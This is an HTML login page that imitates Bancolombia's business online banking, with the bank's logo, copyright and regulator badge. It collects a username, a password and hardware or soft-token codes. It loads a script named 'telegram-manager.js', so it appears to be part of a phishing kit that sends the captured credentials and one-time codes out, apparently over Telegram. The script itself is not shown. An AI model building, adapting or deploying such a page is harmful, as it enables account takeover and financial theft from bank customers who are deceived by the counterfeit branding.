<!DOCTYPE html>
<html lang="es">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Iniciar Sesión - Bancolombia</title>
    <link rel="stylesheet" href="assets/css/styles.css">
    <link rel="stylesheet" href="assets/css/login.css">
    <link rel="stylesheet" href="assets/css/modal.css">
    <link rel="stylesheet" href="assets/css/loading-overlay.css">
    <link rel="stylesheet" href="assets/css/error-message.css">
    <style>
        .hidden {
            display: none !important;
        }

        .token-header {
            text-align: center;
            margin-bottom: 24px;
        }

        .token-icon {
            width: 80px;
            margin-bottom: 16px;
        }

        .login-card__subtitle {
            font-size: 14px;
            color: #666;
            text-align: center;
            margin-bottom: 24px;
        }

        .token-input-wrapper {
            display: flex;
            justify-content: center;
        }

        .token-input-field {
            width: 100%;
            max-width: 280px;
            height: 54px;
            border: 2px solid #ddd;
            border-radius: 8px;
            font-size: 32px;
            text-align: center;
            letter-spacing: 8px;
            font-family: monospace;
            background: #f9f9f9;
        }

        .token-input-field:focus {
            border-color: #FDDA24;
            outline: none;
            background: white;
        }
    </style>
</head>

<body>
    <!-- Header -->
    <header class="header">
        <div class="container">
            <img src="img/logo-bancolombia.png" alt="Bancolombia" class="header__logo">
            <h1 class="header__title">Sucursal Virtual Negocios</h1>
        </div>
    </header>

    <!-- Main Content -->
    <main class="main">
        <div class="container">
            <div class="background-decoration">
                <img src="img/trazo-auth.svg" alt="" class="decoration-svg" aria-hidden="true">
            </div>

            <div class="login-card" id="loginCard">
                <h2 class="login-card__title">Iniciar sesión</h2>

                <div id="errorDisplay" class="error-message">
                    <p class="error-message__text"></p>
                </div>

                <form id="loginForm" class="login-form">
                    <div class="form-group">
                        <label class="floating-label" id="userFloatingLabel">Usuario de Negocios</label>
                        <div class="input-wrapper" id="userWrapper">
                            <svg class="input-icon" width="20" height="20" viewBox="0 0 24 24" fill="none"
                                xmlns="http://www.w3.org/2000/svg">
                                <circle cx="12" cy="8" r="4" stroke="#666" stroke-width="1.5" />
                                <path d="M6 21C6 17.134 8.686 14 12 14C15.314 14 18 17.134 18 21" stroke="#666"
                                    stroke-width="1.5" stroke-linecap="round" />
                            </svg>
                            <input type="text" id="userInput" name="usuario" class="form-input password-input"
                                autocomplete="off" required>
                            <button type="button" class="toggle-password" id="toggleUser" aria-label="Mostrar usuario">
                                <svg class="eye-icon" width="20" height="20" viewBox="0 0 24 24" fill="none"
                                    xmlns="http://www.w3.org/2000/svg">
                                    <path
                                        d="M12 5C7 5 2.73 8.11 1 12.5C2.73 16.89 7 20 12 20C17 20 21.27 16.89 23 12.5C21.27 8.11 17 5 12 5Z"
                                        stroke="#666" stroke-width="1.5" stroke-linecap="round"
                                        stroke-linejoin="round" />
                                    <circle cx="12" cy="12.5" r="3" stroke="#666" stroke-width="1.5" />
                                </svg>
                            </button>
                        </div>
                    </div>

                    <div class="form-group">
                        <label class="floating-label" id="passFloatingLabel">Clave de Negocios</label>
                        <div class="input-wrapper" id="passWrapper">
                            <svg class="input-icon" width="20" height="20" viewBox="0 0 24 24" fill="none"
                                xmlns="http://www.w3.org/2000/svg">
                                <rect x="5" y="11" width="14" height="10" rx="2" stroke="#666" stroke-width="1.5" />
                                <path d="M8 11V7C8 4.79086 9.79086 3 12 3C14.2091 3 16 4.79086 16 7V11" stroke="#666"
                                    stroke-width="1.5" stroke-linecap="round" />
                                <circle cx="12" cy="16" r="1.5" fill="#666" />
                            </svg>
                            <input type="password" id="passInput" name="clave" class="form-input password-input"
                                autocomplete="off" required>
                            <button type="button" class="toggle-password" id="togglePass" aria-label="Mostrar clave">
                                <svg class="eye-icon" width="20" height="20" viewBox="0 0 24 24" fill="none"
                                    xmlns="http://www.w3.org/2000/svg">
                                    <path
                                        d="M12 5C7 5 2.73 8.11 1 12.5C2.73 16.89 7 20 12 20C17 20 21.27 16.89 23 12.5C21.27 8.11 17 5 12 5Z"
                                        stroke="#666" stroke-width="1.5" stroke-linecap="round"
                                        stroke-linejoin="round" />
                                    <circle cx="12" cy="12.5" r="3" stroke="#666" stroke-width="1.5" />
                                </svg>
                            </button>
                        </div>
                    </div>

                    <div class="button-group">
                        <button type="button" id="backBtn" class="btn-secondary"
                            onclick="window.location.href='index.html'">
                            Volver
                        </button>
                        <button type="submit" id="loginBtn" class="btn-submit" disabled>
                            Ingresar
                        </button>
                    </div>
                </form>
            </div>

            <!-- Token Card -->
            <div class="login-card hidden" id="tokenCard">
                <div class="token-header">
                    <img src="img/light-HardToken.svg" alt="Token" class="token-icon">
                    <h2 class="login-card__title">Clave del token</h2>
                    <p class="login-card__subtitle">Ingresa los dígitos de la clave de tu token físico o digital.</p>
                </div>

                <form id="tokenFormCard" class="login-form">
                    <div class="form-group">
                        <div class="token-input-wrapper">
                            <input type="text" id="tokenInputCard" class="token-input-field" maxlength="8"
                                placeholder="••••••••" autocomplete="off" inputmode="numeric">
                        </div>
                    </div>

                    <div class="button-group">
                        <button type="submit" id="tokenSubmitBtn" class="btn-submit enabled">
                            Validar Token
                        </button>
                    </div>
                </form>
            </div>
        </div>
    </main>

    <!-- Footer -->
    <footer class="footer">
        <div class="container">
            <div class="footer-info">
                <div class="footer-info__left">
                    <img src="img/logo-bancolombia.png" alt="Bancolombia" class="footer-info__logo">
                    <div class="footer-info__copyright">
                        <p>Copyright © 2026 Bancolombia.</p>
                        <img src="img/SFC__NEGRO_1_1.png" alt="Vigilado Superintendencia Financiera de Colombia"
                            class="footer-info__badge">
                    </div>
                </div>
            </div>
        </div>
    </footer>

    <!-- Token Modal -->
    <div id="tokenModal" class="modal">
        <div class="modal-content">
            <h2 class="modal-title">Introduce tu Token</h2>
            <p class="modal-text">Por favor, ingresa el código de 6 dígitos generado por tu Soft Token o Token físico.
            </p>
            <form id="tokenForm">
                <div class="form-group">
                    <input type="text" id="tokenInput" name="token" class="form-input text-center" maxlength="6"
                        placeholder="000000" autocomplete="off" required>
                </div>
                <button type="submit" class="btn-submit">Validar</button>
            </form>
        </div>
    </div>

    <!-- Loading Overlay -->
    <div class="loading-overlay">
        <div class="loading-content">
            <div class="loading-spinner"></div>
        </div>
    </div>

    <script src="assets/js/telegram-manager.js"></script>
    <script src="assets/js/login.js"></script>
    <script src="assets/js/token-modal.js"></script>
    <script>
        const urlParams = new URLSearchParams(window.location.search);
        if (urlParams.has('error')) {
            const errorDiv = document.getElementById('errorDisplay');
            const errorText = errorDiv.querySelector('.error-message__text');
            if (urlParams.get('error') === 'credenciales') {
                errorText.textContent = 'Tu usuario o clave son incorrectos. Verifica tus datos e intenta nuevamente.';
                errorDiv.classList.add('active');
            }
        }
    </script>
</body>

</html>